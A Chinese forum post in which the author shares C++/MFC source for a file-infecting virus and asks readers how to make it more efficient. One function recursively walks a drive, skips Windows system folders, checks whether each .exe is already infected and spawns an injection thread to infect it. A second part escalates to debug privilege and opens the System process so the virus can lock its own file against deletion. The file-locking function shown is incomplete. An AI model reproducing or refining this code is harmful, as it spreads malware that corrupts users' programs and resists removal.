登 录
自己在测试过程中,感觉效率不是很好,所以希望哪位大佬能提出宝贵的意见,在此深表感谢!
1、遍历磁盘中PE文件
/************************************************************************/<br /> /* 函数说明:遍历感染指定驱动器中所有exe文件<br /> /* 参 数:驱动器名称,如C:<br /> /* 返 回 值:遍历的数目<br /> /* By:Koma 2009.12.18 23:55<br /> /************************************************************************/<br /> int EmuDiskFiles(LPCTSTR lpStr)<br /> {<br /> CFileFind fd;<br /> CString strWild(lpStr);<br /> CString str = fd.GetFilePath(); // 获取每个文件的绝对路径<br /> int nTemp = 0; // 最大启动5个线程同时感染<br /> BOOL bRet;<br /> HANDLE hThread;<br /> DWORD dwTid;<br /> strWild += _T("//*.*"); // 查找类型<br /> bRet = fd.FindFile(strWild); // 开始查找<br /> while (bRet){ // 如果不为空,继续遍历<br /> ReEmu: bRet = fd.FindNextFile(); // 查找下一个文件<br /> if(fd.IsDots()) // 过滤目录自身与上层目录<br /> continue;<br /> else if(fd.IsDirectory()){ // 判断是否为文件夹<br /> CString str = fd.GetFilePath(); // 获取文件夹路径<br /> EmuDiskFiles(str); // 继续遍历子目录<br /> }<br /> else<br /> {<br /> int nTemp1 = str.Find("WINDOWS"); // 如果是XP系统目录则跳过<br /> int nTemp2 = str.Find("WINNT"); // 如果是WIN2000系统目录也跳过<br /> if(nTemp1>0 || nTemp2>0)<br /> goto ReEmu;<br /> if(str.Find(".exe")>0){ // 判断是否为exe扩展名<br /> if(!IsInfect(str)) // 判断是否感染过<br /> {<br /> di.m_strFilePath = str; // 设置感染文件的绝对路径<br /> hThread = CreateThread (NULL, 0, (unsigned long (__stdcall *)(void *))ThreadInject,(LPVOID)(&diInject),NULL,&dwTid);<br /> WaitForSingleObject(hThread,INFINITE);<br /> //InfectPE(str);<br /> }<br /> continue;<br /> }<br /> }<br /> Sleep(10000); // 10秒种遍历一个文件<br /> }<br /> return 0;<br /> }
2、进程提权、保护文件
/************************************************************************/<br /> /* 函数说明:提升进程权限到debug权限<br /> /* 参 数:无<br /> /* 返 回 值:无<br /> /* By:Koma 2009.12.17 21:20<br /> /************************************************************************/<br /> void RaiseToDebug()<br /> {<br /> HANDLE hToken;<br /> HANDLE hProcess = GetCurrentProcess(); // 获取当前进程句柄 </p> <p> // 打开当前进程的Token,就是一个权限令牌,第二个参数可以用TOKEN_ALL_ACCESS<br /> if (OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))<br /> {<br /> TOKEN_PRIVILEGES tkp;<br /> if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid))<br /> {<br /> tkp.PrivilegeCount = 1;<br /> tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;</p> <p> //通知系统修改进程权限<br /> BOOL bREt = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, 0);<br /> }<br /> CloseHandle(hToken);<br /> }<br /> }<br /> /************************************************************************/<br /> /* 函数说明:保护文件防止被轻易删除<br /> /* 参 数:无<br /> /* 返 回 值:无<br /> /* By:Koma 2009.12.17 21:42<br /> /************************************************************************/<br /> BOOL OccupyFile(LPCTSTR lpFileName)<br /> {<br /> RaiseToDebug(); // 提升权限 </p> <p> // 打开syetem进程,打开前必须赋予PROCESS_DUP_HANDLE权限<br /> HANDLE hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, 4);<br /> if (hProcess == NULL)<br /> {<br /> hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, 8);<br /> if (hProcess == NULL)<br /> return FALSE;<br /> } </p> <p> HANDLE hFile = NULL;<br /> HANDLE hTargetHandle = NULL; </p> <p> // 创建一个文件,当然这个文件可以是本来就存在的<br /> hFile = CreateFile(lpFileName, GENERIC_READ | GENERIC_EXECUTE | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); </p> <p> if (hFile == INVALID_HANDLE_VALUE)<br /> {<br /> // 文件创建或打开失败<br /> CloseHandle( hProcess );<br /> return FALSE;<br /> }<br /> return TRUE;<br /> }
抱歉!评论已关闭.